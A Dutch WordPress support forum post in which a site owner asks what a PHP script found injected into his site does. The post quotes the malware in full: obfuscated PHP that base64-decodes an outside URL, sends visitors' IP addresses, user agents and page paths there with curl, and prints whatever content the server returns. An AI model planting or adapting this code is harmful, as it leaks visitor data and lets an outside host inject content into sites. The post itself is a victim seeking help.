Support » Overige » Malware script geplaatst door hacker

  • Hallo mede WP gebruikers,

    Voor het kantoor van mijn vrouw heb ik een website draaien met WP als CMS. Nu ben ik erachter gekomen (omdat mijn virus scanner de site blokkeerde) dat er verdacht script geplaatst is op de site. Tevens zijn er andere scripts verwijderd (google analytics, en een script voor een floatbox).

    Het script ziet er als volgt uit:

    <?php
    if (!isset($sRetry))
    {
    global $sRetry;
    $sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER[‘HTTP_USER_AGENT’]); // Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = “”;
    if((strstr($sUserAgent, ‘google’) == false)&&(strstr($sUserAgent, ‘yahoo’) == false)&&(strstr($sUserAgent, ‘baidu’) == false)&&(strstr($sUserAgent, ‘msn’) == false)&&(strstr($sUserAgent, ‘opera’) == false)&&(strstr($sUserAgent, ‘chrome’) == false)&&(strstr($sUserAgent, ‘bing’) == false)&&(strstr($sUserAgent, ‘safari’) == false)&&(strstr($sUserAgent, ‘bot’) == false)) // Bot comes
    {
    if(isset($_SERVER[‘REMOTE_ADDR’]) == true && isset($_SERVER[‘HTTP_HOST’]) == true){ // Create bot analitics
    $stCurlLink = base64_decode( ‘aHR0cDovL3B1YmJvdHN0YXRpc3RpYy5jb20vc3RhdEMvc3RhdC5waHA=’).’?ip=’.urlencode($_SERVER[‘REMOTE_ADDR’]).’&useragent=’.urlencode($sUserAgent).’&domainname=’.urlencode($_SERVER[‘HTTP_HOST’]).’&fullpath=’.urlencode($_SERVER[‘REQUEST_URI’]).’&check=’.isset($_GET[‘look’]);
    @$stCurlHandle = curl_init( $stCurlLink );
    }
    }
    if ( $stCurlHandle !== NULL )
    {
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
    $sResult = @curl_exec($stCurlHandle);
    if ($sResult[0]==”O”)
    {$sResult[0]=” “;
    echo $sResult; // Statistic code end
    }
    curl_close($stCurlHandle);
    }
    }
    ?>

    Nu is mijn vraag, hoe heeft dit kunnen gebeuren? Wat doet het script?

    Kan iemand mij hiermee helpen, de script zijn nu wel verwijderd maar ik zou dit in de toekomst ook graag willen voorkomen.

    Alvast bedankt voor jullie reacties

    mvg
    Fox

2 reacties aan het bekijken - 1 tot 2 (van in totaal 2)
2 reacties aan het bekijken - 1 tot 2 (van in totaal 2)
  • Het onderwerp ‘Malware script geplaatst door hacker’ is gesloten voor nieuwe reacties.